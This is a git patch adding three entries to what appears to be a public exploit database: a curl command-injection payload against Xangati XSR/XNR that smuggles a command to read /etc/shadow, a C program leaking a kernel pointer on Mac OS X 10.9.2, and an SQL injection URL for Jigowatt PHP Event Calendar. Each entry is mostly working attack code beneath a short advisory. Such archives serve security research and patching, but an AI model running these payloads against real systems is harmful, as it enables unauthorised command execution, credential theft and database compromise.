From cf0225763fa02b0896885a17e339fe803b2dbafc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 2 Jan 2016 05:02:02 +0000 Subject: [PATCH] DB: 2016-01-02 3 new exploits --- files.csv | 3 +++ platforms/cgi/webapps/39145.txt | 12 ++++++++++++ platforms/osx/local/39147.c | 34 +++++++++++++++++++++++++++++++++ platforms/php/webapps/39146.txt | 9 +++++++++ 4 files changed, 58 insertions(+) create mode 100755 platforms/cgi/webapps/39145.txt create mode 100755 platforms/osx/local/39147.c create mode 100755 platforms/php/webapps/39146.txt diff --git a/files.csv b/files.csv index ccf7bf2c0..190effe1d 100755 --- a/files.csv +++ b/files.csv @@ -35392,3 +35392,6 @@ id,file,description,date,author,platform,type,port 39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0 +39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0 +39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0 diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt new file mode 100755 index 000000000..6582617ad --- /dev/null +++ b/platforms/cgi/webapps/39145.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/66819/info + +Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary commands in the context of the affected application. + +Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. + +curl -i -s -k -X 'POST' \ +-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ +--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \ +'hxxps://www.example.com/servlet/Installer' diff --git a/platforms/osx/local/39147.c b/platforms/osx/local/39147.c new file mode 100755 index 000000000..cd0700c63 --- /dev/null +++ b/platforms/osx/local/39147.c @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/67023/info + +Apple Mac OS X is prone to a local security-bypass vulnerability. + +Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. + +Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected. + +#include +#include +#include + +int main(int argc, char *argv[]) +{ + int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W ); + + if (shm < 0) + { + printf("shmget: failed"); + return 6; + } + + struct shmid_ds lolz; + + int res = shmctl( shm, IPC_STAT, &lolz ); + if (res < 0) + { + printf("shmctl: failed"); + return 1; + } + + printf( "%p\n", lolz.shm_internal ); + +} diff --git a/platforms/php/webapps/39146.txt b/platforms/php/webapps/39146.txt new file mode 100755 index 000000000..fb216ac5d --- /dev/null +++ b/platforms/php/webapps/39146.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/66923/info + +Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected. + +http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection] \ No newline at end of file